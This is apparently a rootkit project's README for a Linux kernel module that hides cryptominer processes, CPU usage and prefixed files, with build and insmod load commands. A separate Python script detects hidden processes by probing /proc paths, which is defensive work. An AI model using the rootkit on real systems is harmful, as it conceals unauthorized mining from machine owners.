Notice: This LKM rootkit is unmaintained. Please use Diamorphine as an alternative.
Related post: https://alfon.xyz/posts/hiding-cryptominers-linux
- Hide process
- Hide process CPU usage
- Hide files whose filename starts with the MAGIC_PREFIX
$ git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
$ cd hiding-cryptominers-linux-rootkit/
$ make
$ dmesg -C # clears all messages from the kernel ring buffer
$ insmod rootkit.ko
$ dmesg # verify that rootkit has been loaded
$ rmmod rootkit
$ dmesg # verify that rootkit has been unloaded
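
A defender-side check for the "Hide process" feature listed above, as an added example that is not part of this repository: it compares the PIDs that a listing of /proc returns with the PIDs that resolve when /proc/<pid>/status is opened directly. It assumes the hiding filters directory listings while direct path lookups still work, which this page does not state; the function names and the sample tree in `demo` are constructed for illustration.

```python
import os
import tempfile

def listed_pids(proc="/proc"):
    """PIDs visible in a directory listing of proc (the view a hider filters)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}

def probe_tgid(pid, proc="/proc"):
    """Open <proc>/<pid>/status by path, bypassing the listing; return Tgid or None."""
    try:
        with open(os.path.join(proc, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except (OSError, ValueError, IndexError):
        pass
    return None

def hidden_pids(max_pid, proc="/proc", lister=listed_pids):
    """Return PIDs that resolve by path as thread-group leaders but are never listed."""
    before = lister(proc)
    # Thread IDs also resolve by path without being listed; Tgid == pid excludes them.
    suspects = [p for p in range(1, max_pid + 1)
                if p not in before and probe_tgid(p, proc) == p]
    # A second listing drops processes that merely started during the scan.
    after = lister(proc)
    return [p for p in suspects if p not in after and probe_tgid(p, proc) == p]

def demo():
    """Constructed /proc-like tree: 40 is normal, 41 is a thread of 40, 77 is hidden."""
    root = tempfile.mkdtemp()
    for pid, tgid in ((1, 1), (40, 40), (41, 40), (77, 77)):
        os.mkdir(os.path.join(root, str(pid)))
        with open(os.path.join(root, str(pid), "status"), "w") as fh:
            fh.write(f"Name:\tsample\nTgid:\t{tgid}\nPid:\t{pid}\n")
    # Simulated filtered listing (assumption): thread 41 is never listed, 77 is hidden.
    filtered = lambda proc: listed_pids(proc) - {41, 77}
    return hidden_pids(100, root, filtered)

if __name__ == "__main__":
    # Live scan of the real /proc up to the kernel's PID limit.
    with open("/proc/sys/kernel/pid_max") as fh:
        print(hidden_pids(int(fh.read())))
```

Run the live scan as root so that /proc mounts using hidepid do not mask other users' processes from the probe.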